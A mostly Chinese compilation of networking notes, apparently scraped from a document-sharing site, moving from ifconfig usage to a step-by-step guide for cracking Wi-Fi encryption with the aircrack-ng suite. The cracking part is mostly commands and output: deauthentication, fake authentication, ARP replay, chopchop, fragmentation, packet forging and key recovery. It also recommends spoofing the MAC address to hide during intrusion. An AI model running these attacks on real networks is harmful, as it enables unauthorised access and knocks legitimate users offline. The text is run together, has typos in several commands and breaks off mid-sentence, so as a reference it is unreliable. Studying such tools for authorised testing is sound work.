1、ifconfig 命 令 有 以 下 两 种 格 式 : ifconfig interface ifconfig interface aftype option | address ifconfig 的 第 一 种 格 式 ( 或 使 用 不 带 任 何 参 数 的 ifconfig 命 令 ) 可 以 用 来 查 看 当 前 系 统 的 网 络 配置 情 况 。在 刚 刚 安 装 完 系 统 之 后 , 实 际 上 是 在 没 有 网 卡 或 者 网 络 连 接 的 情 况 下 使 用 Linux, 但 通 过ifconfig 可 以 使 用 回 绕 方 式 工 作 , 使 计 算 机 认
2、为 自 己 工 作 在 网 络 上 。硬 件 的 MAC 地 址 52:54:AB:DD:6F:61, MAC 地 址 是 生 产 厂 家 定 的 , 每 个 网 卡 拥 有 的 唯 一 地 址 。不 过 我 们 可 以 手 工 改 动 网 卡 的 MAC 地 址 , 只 要 我 们 在 /etc/rc.d/init.d/中 的 network 中 加 入 :ifconfig eth0 hw ether xx:xx:xx:xx:xx:xxeth0, eth1,eth2,代 表 网 卡 一 , 网 卡 二 , 网 卡 三hw 代 表 hardware 硬 件 意 思ether 代 表 ether
3、net 以 太 网 的 意 思然 后 重 启 , 此 时 再 用 ifconfig 命 令 查 看 一 下 , 我 们 就 会 发 现 网 卡 的 MAC 地 址 已 经 变 成 xx:xx:xx:xx:xx:xx 了 。 直 接 通 过 setupnetwork 进 行 设 置 。 ifconfig eth1 /设 置 设 备 1ifconfig eth1 192.168.1.10 netmask 255.255.255.0 /设 置 网 卡 子 网 及 ipman ifconfig 或 ifconfig -help 命 令 : 查 看 帮 助down 关 闭 指 定 的 网 络 设 备 。
4、up 启 动 指 定 的 网 络 设 备 。-arp 打 开 或 关 闭 指 定 接 口 上 使 用 的 ARP 协 议 。 前 面 加 上 一 个 负 号 用 于 关 闭 该 选 项 。-allmuti 关 闭 或 启 动 指 定 接 口 的 无 区 别 模 式 。 前 面 加 上 一 个 负 号 用 于 关 闭 该 选 项 。-promisc 关 闭 或 启 动 指 定 网 络 设 备 的 promiscuous 模 式 。 前 面 加 上 一 个 负 号 用 于 关 闭 该 选 项 。add 设 置 网 络 设 备 IPv6 的 IP 地 址 。del 删 除 网 络 设 备 IPv6
5、的 IP 地 址 。1、ifconfig 可以直接设置 ip 地址。格式如下:ifconfig 网卡名 ip 地址 netmask 子网掩码2、如果想单独查看某块网卡的状况可以用命令 ifconfig 网卡号3、设置辅助 ip 地址 示例:设置第一块网卡的辅助 ip 是 192.168.131 可以这样启动与关闭网卡:ifconfig 网卡名 down #禁用网卡ifconfig 网卡名 up #起用网卡4、更改 mac 地址可以在入侵时来隐藏自己格式如下:ifconfig 网卡名 hw ether mac 地址用于查看和更改网络接口的地址和参数$ifconfig -a更改网络接口的 IP 地
6、址:#ifconfig hme0 down#ifconfig hme0 211.101.149.233 netmask 255.255.255.0 up首先,使用 down 命令参数把网络接口 hme0 的服务暂时停止,然后再用 ifconfig 命令给接口分配新的 IP 地址和掩码,并启动网络接口服务也可以通过改变文件/etc/hosts 中的 IP 地址的值并重新启动系统来更改机器的 IP 地址。/etc/hosts/:211.101.149.11 sampdt定义主机名在/etc/hostname.hme0 及 IP 地址。更改了网卡/增加了网卡,系统不能自动启动该接口服务,这时需要手动
7、创建网口服务:#ifconfig hme0 plumb即可以为接口 le0 创建网口服务相应地,用 ifconfig 带 unplumb 参数可以停止服务并关闭网络Hwaddr 网卡 MAC 地址。网卡出厂时就固化在网卡里的。inet addr: IP 地址 Bcast: 广播地址。指定用于发送广播消息的 IP 地址。使用本地 IP 地址和子网掩码创建缺省广播地址。例如目的地址 192.168.10.255 表示广播至 192.168.10.0 网络上的所有主机。Mask: 子网掩码。子网掩码指示哪部分 IP 地址识别网络,哪部分识别主机。-a 详细显示所有接口-u 显示目前使用中的装置int
8、erface 显示该 interface 的信息,此 interface 为你的网络卡代号或其它代号。down 停用某一装置up 启用某一装置$ ifconfig -a 显示所有接口的信息$ ifconfig vr0 显示网络卡 vr0 的信息$ ifconfig vr0 down 停用网络卡 vr0$ ifconfig vr0 192.168.0.1netmask 255.255.255.0 设定网络卡 vr0 的 ip$ ifconfig vr0 up 启用网络卡 vr0我们也可以使用 ifconfig 来让网络接口运作或停用。用法:ifconfig down|up interface假设
9、我们要让网络卡 vr0 停用:# ifconfig vr0 down我们也可以使用 ifconfig 来设定网络上的 IP 地址。假设要设定 IP 为 192.168.0.1,而子网掩码为 255.255.255.0:# ifconfig vr0 192.168.0.1 netmask 255.255.255.0接着再使用 ifconfig 将 vr0 启用:# ifconfig vr0 upaireplay-ng 的 6 中攻击模式详解-0 deautenticate 冲突模式使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的 arp
10、 数据。如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3 也无法产生有效的 arp 数据,所以就需要用-0 攻击模式来配合 -3 攻击来会被激活aireplay-ng -0 10 -a ap_mac -c 合法客户端 mac wifi0参数说明:10 表示发送次数(设置为 0 表示循环攻击,客户端无法正常上网)-a 设置 ap 的 mac 地址,-c 设置已连接的合法客户端的 mac 地址( 如果要-c 则所有与 ap 连接的客户端全部断线)-1 fakeauth count 伪装一个客户端和 ap 进行连接这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因
11、此需要一个伪装客户端来和路由器连接。为让 ap 接受数据包,必须使自己的网卡和 ap 关联。-1 伪装客户端连接成功够才能用发送注入命令aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0参数说明:0 表示岩石 0 秒后连接;-e 设置 ap_essid;-a 设置 ap 的 mac 地址 -h 设置伪装客户端的网卡 mac地址(就是自己网卡的 mac 地址)-2 interactive 交互模式这个模式集合了抓包和提取数据,发包注入三种功能ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_
12、mac -h my_mac wifi0参数说明:-p 设置控制帧中包含的信息( 16 进制) ,默认采用 0841;-c :设置目标 mac 地址;-b 设置 ap 的mac 地址;-h 伪装的客户端网卡 mac 地址(就是自己的 mac 地址)提取包,发送注入数据包aireplay-ng -2 -r myarp -x 1024 wifi0参数说明:myarp:自己设置的文件名;-x 1024:发包的速度(最大为 1024)-3 arp-request 注入攻击模式这种模式是一种抓包后分析重发的过程aireplay-ng -3 -b ap_mac -h 合法客户端 mac -x 512 wif
13、i0-4 chopchop 攻击模式,用来获得一个包含密钥数据的 xor 文件aireplay-ng -4 -b ap-mac -h my_mac wifi0-5 fragment 碎片包攻击模式,用来获得 PRGA(包含密钥的后缀为 xor 的文件)aireplay-ng -5 -b ap_mac -h my_mac wifi0 packetforge-ng 数据包制造程序packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp参数说明:-0:伪
14、装 arp 数据包; -k:设置目标文件 ip 和端口;-l:设置源文件 IP 和端口;-y:从 xor 文件中读取 PRGA;name:xor 文件的名字;-w 设置伪装的 arp 包的文件名aircrack-ng -n 64 -b ap_mac name-01.ivs3.1 a, 启动,使用光盘启动,并选择其中一个,本人选择为第 3 个;b, 设置无线网卡为混杂模式,并开启;iwconfig wlan0 mode monitor channel 6把网卡设置成侦听模式,侦听信道 6(把这个数字改成你所要破解的 AP 的信道)ifconfig ath0 up启动网卡c, 使用 airodum
15、p 抓包, airodump -ivs -w /tmp/1.pcap -channel 6 wlan0 若这步没有问题的话,则能看到当前该 channel 下的 ap 的概况, 以及还有目前已经连接上的session;3.2 攻击, 为了更多的 date 包;aireplay-ng -3 -b 00:06:d3:07:00:18(ap mac) -h 00:14:25:35:a2:1b(your wifi card address) wlan0/ 发 arp 包给 ap,目的是获取更多的 data 包. -3 表示该攻击模式, -h 表示,aireplay-ng -0 5 -a 00:06:d
16、3:07:00:18 -c 00:14:a5:2a:b6:b3(已经连接上的 station 的 mac) wlan0 / 攻击已经连接上的 client,使其重新连接 . -0 表示该攻击模式, 5 表示重试 5 次, -a 表示 bssid;3.3 破解, 使用 aircrack-ngaircrack -a 1 -w /tmp/1.pcap*.ivs -b 00:06:d3:07:00:18 -s -n 64-a 表示对 wep 破解, -w 读取抓包保存的 file, -s 表示使用 assic 显示密码, -b 表示只破解该 bssid 的密码; -n 表示 wep 的加密位数,可以先
17、使用 64,再使用 128 位. 4, 若 ap 没有开启 ssid, 不发 beacon 包如何破解;5, 若 ap 没有 client 连接上时如何破解;6, 如何确认 ap 是否开启了 mac fitler 功能? 7, 当 ap 关闭 dhcp 时如何处理?If you cant get this card to run in Monitor mode try the following: BT #airmon-ng stop ath0 BT #airmon-ng start wifi0 Then run iwconfig and check if ath0 is in Monitor
18、 mode. If it still isnt, try the following: BT #ifconfig ath0 down BT #airmon-ng start ath1 wifi0 should now parent ath1, and ath1 should be in Monitor mode. If it isnt, try: BT #airmon-ng start wifi0 1,使用-1 攻击,骗取 ap 的信任; (aireplay-ng -1 10 -e essid -a ap_mac -h wificard_mac ath0这一步很重要, 如果这步不成功,下面很难
19、成功;因为在使用第 4 步攻击时,使用的是广播包,必须先通过虚假认证,ap 才会和你进行交互,给你回复包,产生交流. 注意使用-e 和-a 而不是-b; -a 为设置被攻击的 mac 地址,而-b 只是其过滤作用;2,使用-5 抓到一个 arp 包,aireplay -5 -b bssid/ap_mac -h wificard_mac ath0 在这里使用-b,是为过滤作用, 需要抓到该 bssid 的包;该步会生成一个 fragment.xor 文件. 若生成失败则表示未成功 ;3,使用 packetforge 工具改装该包,使其成为 arp 的注入式攻击包 (修改 bssid 和 host
20、 mac)packetforge-ng -arp -y fragment-date-time.xor -a ap_mac -h wificard_mac -k 255.255.255.255 -l 255.255.255.255 -w arp_my-arp 表示重组一个 arp 包, -y 表示读取 xor 文件( 由第二步生成), -a 设置要攻击的 mac , -h wificard_mac, -k 表示目的 ip 和端口 -l 表示源 ip 和端口.-w 写成一个包( 该包为注入式的包,为攻击的炮弹). 4,使用-2 攻击, interactive 攻击,是 data 数值飞涨 ;air
21、eplay -2 -r arp_my -x 1024 ath0 -2 表示互动攻击, 大量发送刚才生成的广播包, 这里不需要指定 ap 的 mac 地址, 需要指定网卡和速率以及炮弹的路径即可. -r 表示读取炮弹;5,使用 aircrack 进行破解;aircarck-ng -w /tmp/2*.cap -s 下面附上一个关于 aireplay 各种攻击模式的说明 在下面的例子中,00:13:10:30:24:9C 是 AP(无线路由) 的 MAC 地址(on channel 6), 00:09:5B:EB:C5:2B 是客户的 MAC address+ Attack 0: deauthen
22、tication这种攻击模式强制断开客户端与路由端的连接,使其重新连接,在此期间,可以捕获 WAP 的 handshakes,以及 WEP 的有效 ivs,并产生有效 ARP 攻击(配合-3 攻击) 。这在实践中是非常有效的。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3(见下面具体内容)也无法产生有效 ARP攻击。如果在-3 的同时,另外进行 -0 攻击,-3 攻击会被立刻激活。显而易见,如果没有客户端是不成的。Some examples:o WPA Handshake capture with an Atherosairmon.sh start ath0airo
23、dump ath0 out 6 (switch to another console)aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0(wait for a few seconds)aircrack -w /path/to/dictionary out.capo ARP request generation with a Prism2 cardairmon.sh start wlan0airodump wlan0 out 6 (switch to another console)aireplay -0 5 -a 00:13
24、:10:30:24:9C wlan0aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0aireplay -0 5 -进行五次攻击,如果为 0,则循环攻击,客户端无法正常上网,不停的断开连接。-a 后是路由的 mac 地址。可以加 -h 后为攻击的客户端的 mac 地址,也可以不加。wlan0 为自己的网卡名。用 ifconfig -a 看,也可以是 wifi0,ath1 等等。有很多帖子都有叙述,这里就不再多说了。 + Attack 1: fake authentication这种攻击在没有合法客户端与路由相连时有些用处,这里
25、我们伪装了一个客户端并使之育路由连接。这个操作可以配合 -3 (ARP request reinjection)和 -4 (“chopchop“ WEP decryption).使用。如果,有客户端,则针对客户端使用-3 或 -4 更为有效。实际上,如果没有客户端的话,这种攻击很可能没有效果。 aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath012:14:06 Sending Authentication Request12:14:06 Authentication successful12:14:06 Sending
26、Association Request12:14:07 Association successful :-)ifconfig ath0 down hw ether 00:10:20:30:40:50 | iwconfig ath0 mode Managed essid myap key AAAAAAAAAA | ifconfig ath0 up | | sysctl -w dev.ath0.rawdev=1 | ifconfig ath0raw up | airodump ath0raw out 6 | | Then you can run attack 3 or 4 (aireplay wi
27、ll automatically replace | ath0 with ath0raw below): | | aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0 | aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0 | |+-+Some access points require to reassociate every 30 seconds, otherwiseour fake client is considered disconnected. In this case, setup
28、theperiodic re-association delay:aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0+ Attack 2: interactive packet replay这种攻击模式几本无用,只是某些时候做测试用。aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0+ Attack 3: ARP-request reinjection这种攻击模式是最为有效的。这里你既可以利用合法客户端,也可以配合-1 利用伪装客户端。一般情况下,你需要等几分钟直
29、到出现有效 ARP request. 如果没有任何通信存在,则这种攻击就会失败。在实践中,如果合法客户端和路由之间长时间内没有 ARP request,可以尝试同时使用-0 攻击。Please note that you can also reuse ARP requests from a previouscapture using the -r switch.aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0Saving ARP requests in replay_arp-0627-121526.capYou must also sta
30、rt airodump to capture replies.Read 2493 packets (got 1 ARP requests), sent 1305 packets.+ Attack 4: KoreKs “chopchop“ (CRC prediction)这种攻击模式不常用,但是一旦成果,则可以在不知道密码的情况下破解 WEP 包。This attack, when successful, can decrypt a WEP data packet withoutknowing the key. It can even work against dynamic WEP. This
31、 attack doesnot recover the WEP key itself, but merely reveals the plaintext.However, most access points are not vulnerable at all. Some may seemvulnerable at first but actually drop data packets shorter that 60bytes. This attack requires at least one WEP data packet.1. First, we decrypt one packet
32、:aireplay -4 -h 00:09:5B:EB:C5:2B ath02. Lets have a look at the IP address :tcpdump -s 0 -n -e -r replay_dec-0627-022301.capreading from file replay_dec-0627-022301.cap, link-type .IP 192.168.1.2 192.168.1.255: icmp 64: echo request seq 13. Then, forge an ARP request.The source IP (192.168.1.100) d
33、oesnt matter, but the destinationIP (192.168.1.2) must respond to ARP requests. The source MAC mustbelong to an associated station./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap4. And replay our forged ARP request :aireplay -2 -r arp.cap
34、ath0Aireplay-ngDescriptionAireplay-ng is used to inject frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake auth
35、entications, Interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection. With the packetforge-ng tool its possible to create arbitrary frames. Most drivers needs to be patched to be able to inject, dont forget to read Installing drivers. Usage of the attacksIt currentl
36、y implements multiple different attacks: Attack 0: DeauthenticationAttack 1: Fake authenticationAttack 2: Interactive packet replayAttack 3: ARP request replay attackAttack 4: KoreK chopchop attack Attack 5: Fragmentation attackAttack 6: Caffe-latte attack (Coming in the next release! Not available
37、now.)Attack 7: Client-oriented fragmentation attack (Coming in the next release! Not available now.)Attack 9: Injection testUsageThis section provides a general overview. Not all options apply to all attacks. See the details of the sepcific attack for the relevant details. Usage: aireplay-ng For all
38、 the attacks except deauthentication and fake authentication, you may use the following filters to limit which packets will be presented to the particular attack. The most commonly used filter option is the ”-b” to select a specific access point. For typical usage, the ”-b” is the only one you use.
39、Filter options: -b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame
40、control, From DS bit-w iswep : frame control, WEP bitWhen replaying (injecting) packets, the following options apply. Keep in mind that not every option is relevant for every attack. The specific attack documention provides examples of the relevant options. Replay options: -x nbpps : number of packe
41、ts per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-e essid : fakeauth attack : set target AP SSID-j : arpreplay attack : inject FromDS pkts-g value : change ring buffer size (default: 8)-k I
42、P : set destination IP in fragments-l IP : set source IP in fragments-o npckts : number of packets per burst (-1)-q sec : seconds between keep-alives (-1)-y prga : keystream for shared key authThe attacks can obtain packets to replay from two sources. The first being a live flow of packets from your
43、 wireless card. The second being from a pcap file. Standard Pcap format (Packet CAPture, associated with the libpcap library http:/www.tcpdump.org), is recognized by most commercial and open-source traffic capture and analysis tools. Reading from a file is an often overlooked feature of aireplay-ng.
44、 This allows you read packets from other capture sessions or quite often, various attacks generate pcap files for easy reuse. Source options: iface : capture packets from this interface-r file : extract packets from this pcap fileThis is how you specify which mode (attack) the program will operate i
45、n. Depending on the mode, not all options above are applicable. Attack modes (Numbers can still be used): - -deauth count : deauthenticate 1 or all stations (-0)- -fakeauth delay : fake authentication with AP (-1)- -interactive : interactive frame selection (-2)- -arpreplay : standard ARP-request re
46、play (-3)- -chopchop : decrypt/chopchop WEP packet (-4)- -fragment : generates valid keystream (-5)- -test : injection test (-9)Fragmentation vs. ChopchopHere are the differences between the fragmentation and chopchop attacks FragmentationPros:Typically obtains the full packet length of 1500 bytes x
47、or. This means you can subsequently pretty well create any size of packet. Even in cases where less then 1500 bytes are collected, there is sufficient to create ARP requests.May work where chopchop does not.Is extremely fast. It yields the xor stream extremely quickly when successful.Cons:Need more
48、information to launch it - IE IP address info. Quite often this can be guessed. Better still, aireplay-ng assumes source and destination IPs of 255.255.255.255 if nothing is specified. This will work successfully on most if not all APs. So this is a very limited con.Setup to execute the attack is mo
49、re subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set to the mac address you are spoofing.You need to be physically closer to the access point since if any packets are lost then the attack fails.The attack will fail on access points which do not properly handle fragmented packets.ChopchopPros:May work where fragmentation does not work.You dont need to know